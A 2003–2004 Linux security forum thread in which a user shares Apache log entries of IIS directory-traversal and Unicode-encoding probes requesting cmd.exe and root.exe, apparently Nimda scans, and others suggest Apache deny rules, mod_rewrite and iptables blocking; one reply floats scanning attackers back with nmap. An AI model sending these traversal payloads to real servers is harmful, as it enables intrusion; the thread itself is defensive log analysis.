LinuxQuestions.org
Visit Jeremy's Blog.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 11-21-2003, 02:05 AM   #1
rajbaxi
Member
 
Registered: Jul 2003
Location: MI
Distribution: redhat,mandrake,debian
Posts: 68

Rep: Reputation: 15
Apache Log


I looked at my Apache Server log today and found:

68.43.98.93 - - [16/Nov/2003:07:25:46 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:49 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:51 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:53 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:57 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:25:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:04 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:06 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:08 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:10 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:12 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.98.93 - - [16/Nov/2003:07:26:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.98.93 - - [16/Nov/2003:07:26:16 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.98.93 - - [16/Nov/2003:07:26:18 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:49 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.25.151 - - [16/Nov/2003:10:35:50 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.25.151 - - [16/Nov/2003:10:35:51 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:35 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:36 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:36 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:37 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:39 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:39 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.44.168.38 - - [16/Nov/2003:12:44:41 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.44.168.38 - - [16/Nov/2003:12:44:41 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.44.168.38 - - [16/Nov/2003:12:44:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:50 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.10.31 - - [16/Nov/2003:14:17:51 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967
68.43.10.31 - - [16/Nov/2003:14:17:55 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034
68.43.10.31 - - [16/Nov/2003:14:17:55 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034

It's doesn't look like legitimate HTTP requests to me (correct me if I'm wrong). If it's not, I would like to know a way to block these. Any ideas?
 
Old 11-21-2003, 04:52 AM   #2
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: Slackware, Termux
Posts: 764

Rep: Reputation: 240Reputation: 240Reputation: 240
Either:

A) A _really_ dumb script-kiddie is checking you, thinking he's got a IIS webserver. Since it seems to combine several known exploits together, this may be a scanner of some sort, which would normally be used on one's OWN site to test it- instead someone use it on you.

B) The slightly newer x-site scripting exploit mixxed in with A.) (because of the vti_ crap) I had someone browsing my site, looking around, cool..... just before he left he fired off one of those.

C) Yet another version of the IIS unicode exploit is making it's rounds. I posted it to usenet because people kept asking about it there. This doesn't appear to be a worm, since the worm that follows similar parterns only exibits a very limited amount of code.

I moved my server up to 443, SSL'ed it just because I got tired of seeing that kinda stuff. If you're gonna attack me, _at least_ ID my system correctly. All the point -n- click scripts I've seen to do this kind of stuff don't bother with the https port, just straight http, and most people don't rewrite it to either. Take note of the IP address they're coming from. If you want to get fancy, make a custom error doc for anyone hitting on the /scripts/ directory (since an Apache server shouldn't have one by default) telling them just what you think of them. Just make sure the direcory is never linked so that legit clients can't click to it. Then you'll know anyone landing in it is looking specially for it, most likely indicating an attempt to be naughty.
That's what I did.
 
Old 11-21-2003, 05:07 AM   #3
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: Slackware, Termux
Posts: 764

Rep: Reputation: 240Reputation: 240Reputation: 240
I checked, those are COMCAST addresses, people I've had trouble with before (if you didn't change the address, which it doesn't look like) so I don't think complaining to them will do any good. You can do this:

#Or whatever your webroot dir is
<Directory /var/www >
Order allow, deny
Allow from all
Deny from comcast.net
</Directory>

# And maybe one of these for the directories they like to play in
# Put something colorful in go-to-hell.html
<Location /scripts/*>
Deny from all
ErrorDocument 403 http://yer.site.net/go-to-hell.html
</Location>

If you've got PHP going, you should be able to use it in your error document too, and really be ready when they come, like log their IP's, insert their IP in a iptables black-list or a .htaccess list, or even lauch nmap against them, etc.
 
Old 11-21-2003, 02:15 PM   #4
rajbaxi
Member
 
Registered: Jul 2003
Location: MI
Distribution: redhat,mandrake,debian
Posts: 68

Original Poster
Rep: Reputation: 15
I already know that they're from comcast's IP block, however, if I block comcast.net then even I couldn't access my own site (not what I want). How do I do the iptables black-list?
 
Old 11-21-2003, 02:47 PM   #5
rajbaxi
Member
 
Registered: Jul 2003
Location: MI
Distribution: redhat,mandrake,debian
Posts: 68

Original Poster
Rep: Reputation: 15
what about non-existent /* locations such as www.server.com/non-existent? Can I do something for those?
 
Old 11-21-2003, 02:49 PM   #6
rajbaxi
Member
 
Registered: Jul 2003
Location: MI
Distribution: redhat,mandrake,debian
Posts: 68

Original Poster
Rep: Reputation: 15
jayjwa: part of my server is on ssl. however, I cannot move my server completely to https://servername.com because people who legitimately access my server have a hard enough time not typing in the www. prefix.
 
Old 11-21-2003, 04:21 PM   #7
rajbaxi
Member
 
Registered: Jul 2003
Location: MI
Distribution: redhat,mandrake,debian
Posts: 68

Original Poster
Rep: Reputation: 15
If it was a port scanner, are these valid IP Addresses? What port scanner could do this?
 
Old 11-25-2003, 08:59 AM   #8
sopiaz57
Member
 
Registered: Apr 2003
Distribution: RH 8
Posts: 246

Rep: Reputation: 30
Although this is a fine though, it is by no means an option. For one, each and every time you get a visitor apache is going to have to check DNS and verify the IP. Thats going to slow things down.

I suggest you focus your time on securing your system rather than worrying who is scanning your box. They can scan all they want, and you can never stop that. What else do you have running on the maching?

#Or whatever your webroot dir is
<Directory /var/www >
Order allow, deny
Allow from all
Deny from comcast.net
</Directory>
 
Old 11-25-2003, 03:53 PM   #9
rajbaxi
Member
 
Registered: Jul 2003
Location: MI
Distribution: redhat,mandrake,debian
Posts: 68

Original Poster
Rep: Reputation: 15
Quite a bit. However the Web Server and Mail Server (outgoing and incoming) are accessible over the internet.
 
Old 11-30-2003, 11:57 AM   #10
Belize
Member
 
Registered: Jul 2003
Posts: 113

Rep: Reputation: 15
When I had apache started I had frequently such stupid scans, even though I didnt maintain a website
 
Old 03-21-2004, 10:01 PM   #11
rajbaxi
Member
 
Registered: Jul 2003
Location: MI
Distribution: redhat,mandrake,debian
Posts: 68

Original Poster
Rep: Reputation: 15
Okay... I found something where iptables can block by string matching at linuxsecurity.com. I downloaded the kernel source (version 2.4.21), iptables 1.2.7a, patch-o-matic-20030107, and FWSnort (contains the patch for string capability). I followed the guide exactly however, when I tried to run "make KERNEL_DIR=../kernel_src", I get the following error:

[raj@chopin iptables-1.2.7a]$ make KERNEL_DIR=../linux-2.4.21
Extensions found: IPv6:ah IPv6:esp IPv6:frag IPv6:ipv6header IPv6:hbh IPv6:dst IPv6:rt
cc -O2 -Wall -Wunused -I../linux-2.4.21/include -Iinclude/ -DIPTABLES_VERSION=\"1.2.7a\" -fPIC -o extensions/libipt_ah_sh.o -c extensions/libipt_ah.c
In file included from ../linux-2.4.21/include/linux/config.h:4,
from ../linux-2.4.21/include/linux/netfilter_ipv4.h:8,
from ../linux-2.4.21/include/linux/netfilter_ipv4/ip_tables.h:25,
from include/libiptc/libiptc.h:6,
from include/iptables.h:5,
from extensions/libipt_ah.c:8:
/usr/include/linux/autoconf.h:1:2: #error Invalid kernel header included in userspace
make: *** [extensions/libipt_ah_sh.o] Error 1
[raj@chopin iptables-1.2.7a]$

I thought I was pretty linux savvy but kernel stuff just boggles my mind and I was hoping someone ran into this error, or can figure out what the hell is wrong.

Here is the link for the article: http://www.linuxsecurity.com/feature...story-148.html
 
Old 03-21-2004, 11:17 PM   #12
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
It would probably be easier and less of a load on the server to use mod_rewrite to do that instead. Checking every packet for certain strings is a serious chore. Just turn on the rewrite engine, and add a rewrite rule that matches anything that has cmd.exe in it. That should handle most of the IIS exploits that try to fire back a command shell.

Btw, just briefly glancing at the exploit, that looks like several Nimda scans to me. While annoying, you will likely end up wasting a significant amount of resources in trying to stop harmless scans like that.
 
Old 03-21-2004, 11:28 PM   #13
rajbaxi
Member
 
Registered: Jul 2003
Location: MI
Distribution: redhat,mandrake,debian
Posts: 68

Original Poster
Rep: Reputation: 15
Less of a load yes. But IPTables is pretty good at Packet Inspection. Thanks for the advice though.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Strange results in /var/log/apache/access.log subt13 Linux - Security 2 08-03-2004 01:21 PM
More Apache Log Errors! Crashed_Again Linux - General 2 02-27-2003 05:21 AM
apache access log mindcry Linux - Security 6 02-12-2003 12:17 PM
Apache Log Crashed_Again Linux - Security 5 02-01-2003 08:27 AM
Apache Session Log? abelsgmx Linux - Networking 4 06-11-2002 03:44 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 05:42 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration